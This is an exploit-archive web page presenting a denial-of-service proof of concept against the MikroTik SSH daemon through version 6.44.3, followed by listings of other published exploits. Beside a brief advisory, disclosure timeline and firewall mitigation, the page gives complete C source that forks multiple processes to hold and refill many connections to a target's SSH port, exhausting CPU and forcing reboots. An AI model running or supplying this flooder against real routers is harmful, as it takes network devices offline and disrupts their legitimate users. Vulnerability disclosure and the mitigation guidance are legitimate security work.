Menu

Search for hundreds of thousands of exploits

"Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)"

Author

Exploit author

FarazPajohan

Platform

Exploit platform

hardware

Release date

Exploit published date

2020-03-18

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
# Excploit Title: Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)
# Author: Hosein Askari
# Date: 2020-03-18
# Vendor Homepage: https://mikrotik.com/
# Model: hAP lite
# Processor architecture: smips
# Affected Version: through 6.44.3
# CVE: N/A

#Description:
An uncontrolled resource consumption vulnerability in SSH daemon on MikroTik routers through v6.44.3 could allow remote attackers to generate CPU activity, trigger refusal of new authorized connections with SIGPIPE signal(SIGPIPE is the "broken pipe" signal, which is sent to a process when it attempts to write to a pipe whose read end has closed or when it attempts to write to a socket that is no longer open for reading. The default action is to terminate the process) and cause a reboot via connect and write system calls because of uncontrolled resource management.
#details:
The issue reported in 02/25/2020 to the Mikrotik
First response by Mikrotik in 02/26/2020
The additional information about exploit and PoC video sent in 02/26/2020
The vulnerability is accepted by "Reinis-Jānis S" from mikrotik security team in 02/27/2020 and asked for providing the CVE number and disclosure date
#PoC:
#Mitigation:
It can be mitigated with firewall filter and service port restrictions.
Solution:
Hardening and tuning the daemon for these 2 parameters:
1- Number of allowed unauthenticated connections to ssh daemon
2- Maximum number of connections at which we start dropping everything for ssh daemon
PoC:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <signal.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define MAX_CON 32
#define MAX_THREADS 16

int Socket(char *ip, char *port) {
    struct addrinfo hints, *ret, *p;
    int sock, r; 
    ssize_t bytes;
    char buffer[2048];
    memset(&hints, 0, sizeof(hints));
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;
    if((r=getaddrinfo(ip, port, &hints, &ret))!=0) {
        return EXIT_FAILURE;
       }
    for(p = ret; p != NULL; p = p->ai_next) {
        if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
            continue;
        }
        if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
            close(sock);
            continue;
        }
        break;
    }
    if(ret)
        freeaddrinfo(ret);
    fprintf(stderr, "ESTABLISHED  %s:%s\n", ip, port);
    return sock;
}

void signal_callback_handler(int signum){
        printf("Caught signal SIGPIPE %d\n",signum);
}

void mal(char *ip, char *port, int id) {
    int sockets[MAX_CON];
    int i, g=1, r;
    for(i=0; i!= MAX_CON; i++)
        sockets[i]=0;
    signal(SIGPIPE, signal_callback_handler);
    while(1) {
        for(i=0; i!= MAX_CON; i++) {
            if(sockets[i] == 0)
                sockets[i] = Socket(ip, port);
            r=write(sockets[i], "\0", 1);
            if(r == -1) {
                close(sockets[i]);
                sockets[i] = Socket(ip, port);
            }
        }
        usleep(200000);
    }
}

int main(int argc, char **argv) {
    int i;
    for(i=0; i!= MAX_THREADS; i++) {
        if(fork())
            mal(argv[1], argv[2], i);
        usleep(200000);
    }
    getc(stdin);
    return 0;
}
#########

Sincerely,
Hosein Askari
Release DateTitleTypePlatformAuthor
2020-03-30"Zen Load Balancer 3.10.1 - Remote Code Execution"webappscgi"Cody Sixteen"
2020-03-30"10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP)"localwindowsHodorsec
2020-03-30"Multiple DrayTek Products - Pre-authentication Remote Root Code Execution"remotelinux0xsha
2020-03-30"Joomla! com_fabrik 3.9.11 - Directory Traversal"webappsphpqw3rTyTy
2020-03-30"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation"localwindows"Daniel García Gutiérrez"
2020-03-30"Odin Secure FTP Expert 7.6.3 - 'Site Info' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-27"ECK Hotel 1.0 - Cross-Site Request Forgery (Add Admin)"webappsphp"Mustafa Emre Gül"
2020-03-27"Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal"webappsjavahongphukt
2020-03-27"Everest 5.50.2100 - 'Open File' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-27"rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution"webappsphpvikingfr
2020-03-27"Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH)"localwindows"Felipe Winsnes"
2020-03-26"TP-Link Archer C50 3 - Denial of Service (PoC)"webappshardwarethewhiteh4t
2020-03-26"Centreo 19.10.8 - 'DisplayServiceStatus' Remote Code Execution"webappsphp"Engin Demirbilek"
2020-03-25"AVAST SecureLine 5.5.522.0 - 'SecureLine' Unquoted Service Path"localwindows"Roberto Piña"
2020-03-25"10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path"localwindows"Felipe Winsnes"
2020-03-25"Joomla! Component GMapFP 3.30 - Arbitrary File Upload"webappsphpThelastVvV
2020-03-25"10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)"localwindows"Felipe Winsnes"
2020-03-25"LeptonCMS 4.5.0 - Persistent Cross-Site Scripting"webappsphpSunCSR
2020-03-24"UliCMS 2020.1 - Persistent Cross-Site Scripting"webappsphpSunCSR
2020-03-24"Wordpress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting"webappsphp"Jinson Varghese Behanan"
2020-03-24"Veyon 4.3.4 - 'VeyonService' Unquoted Service Path"localwindows"Víctor García"
2020-03-24"UCM6202 1.0.18.13 - Remote Command Injection"webappshardware"Jacob Baines"
2020-03-23"ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service (PoC)"dosios"Ivan Marmolejo"
2020-03-23"FIBARO System Home Center 5.021 - Remote File Include"webappsmultipleLiquidWorm
2020-03-23"Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection"webappsphpqw3rTyTy
2020-03-23"rConfig 3.9.4 - 'search.crud.php' Remote Command Injection"webappsphp"Matthew Aberegg"
2020-03-23"Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC)"doswindows"Cem Onat Karagun"
2020-03-23"CyberArk PSMP 10.9.1 - Policy Restriction Bypass"remotemultiple"LAHBAL Said"
2020-03-20"VMware Fusion 11.5.2 - Privilege Escalation"localmacos"Rich Mirch"
2020-03-20"Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)"webappsphp"Metin Yunus Kandemir"
Release DateTitleTypePlatformAuthor
2020-03-26"TP-Link Archer C50 3 - Denial of Service (PoC)"webappshardwarethewhiteh4t
2020-03-24"UCM6202 1.0.18.13 - Remote Command Injection"webappshardware"Jacob Baines"
2020-03-18"Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)"remotehardwareFarazPajohan
2020-03-18"Netlink GPON Router 1.0.11 - Remote Code Execution"webappshardwareshellord
2020-03-13"Drobo 5N2 4.1.1 - Remote Command Injection"remotehardware"Ian Sindermann"
2020-03-03"RICOH Aficio SP 5200S Printer - 'entryNameIn' HTML Injection"webappshardware"Paulina Girón"
2020-03-03"RICOH Aficio SP 5210SF Printer - 'entryNameIn' HTML Injection"webappshardware"Olga Villagran"
2020-03-02"TL-WR849N 0.9.1 4.16 - Authentication Bypass (Upload Firmware)"webappshardware"Elber Tavares"
2020-03-02"Netis WF2419 2.2.36123 - Remote Code Execution"webappshardware"Elias Issa"
2020-03-02"Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload)"webappshardware"Elber Tavares"
2020-03-02"TP LINK TL-WR849N - Remote Code Execution"webappshardware"Elber Tavares"
2020-02-27"Comtrend VR-3033 - Command Injection"webappshardware"Raki Ben Hamouda"
2020-02-24"Aptina AR0130 960P 1.3MP Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-24"SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-24"I6032B-P POE 2.0MP Outdoor Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-24"SecuSTATION SC-831 HD Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-24"Avaya IP Office Application Server 11.0.0.0 - Reflective Cross-Site Scripting"webappshardware"Scott Goodwin"
2020-02-24"ESCAM QD-900 WIFI HD Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-19"Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak"webappshardwarebyteGoblin
2020-02-19"DBPower C300 HD Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-17"Avaya Aura Communication Manager 5.2 - Remote Code Execution"webappshardware"Sarang Tumne"
2020-02-05"Wago PFC200 - Authenticated Remote Code Execution (Metasploit)"webappshardware0x483d
2020-02-05"HiSilicon DVR/NVR hi3520d firmware - Remote Backdoor Account"remotehardwareSnawoot
2020-02-03"Schneider Electric U.Motion Builder 1.3.4 - Authenticated Command Injection"webappshardware"Cosmin Craciun"
2020-01-29"Satellian 1.12 - Remote Code Execution"webappshardwareXh4H
2020-01-29"Fifthplay S.A.M.I 2019.2_HP - Persistent Cross-Site Scripting"webappshardwareLiquidWorm
2020-01-24"Genexis Platinum-4410 2.1 - Authentication Bypass"webappshardware"Husinul Sanub"
2020-01-24"TP-Link TP-SG105E 1.0.0 - Unauthenticated Remote Reboot"webappshardwarePCEumel
2020-01-15"Sagemcom [email protected] 3890 (50_10_19-T1) Cable Modem - 'Cable Haunt' Remote Code Execution"remotehardwareLyrebirds
2020-01-15"Huawei HG255 - Directory Traversal ( Metasploit )"webappshardware"Ismail Tasdelen"
Release DateTitleTypePlatformAuthor
2020-03-18"Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)"remotehardwareFarazPajohan
2018-04-13"MikroTik 6.41.4 - FTP daemon Denial of Service PoC"webappslinuxFarazPajohan
2017-12-11"MikroTik 6.40.5 ICMP - Denial of Service"doshardwareFarazPajohan
2017-09-11"tcprewrite - Heap Buffer Overflow"doslinuxFarazPajohan
2017-06-05"DNSTracer 1.8.1 - Buffer Overflow (PoC)"doslinuxFarazPajohan
2017-04-19"Dmitry 1.3a - Local Buffer Overflow (PoC)"doslinuxFarazPajohan
2017-04-02"BackBox OS - Denial of Service"doslinuxFarazPajohan
2017-03-28"MikroTik RouterBoard 6.38.5 - Denial of Service"doshardwareFarazPajohan
2017-03-05"MikroTik Router - ARP Table OverFlow Denial Of Service"doshardwareFarazPajohan
2017-02-12"Linux Kernel 3.10.0 (CentOS7) - Denial of Service"doslinuxFarazPajohan
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/48228/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Browse exploit APIBrowse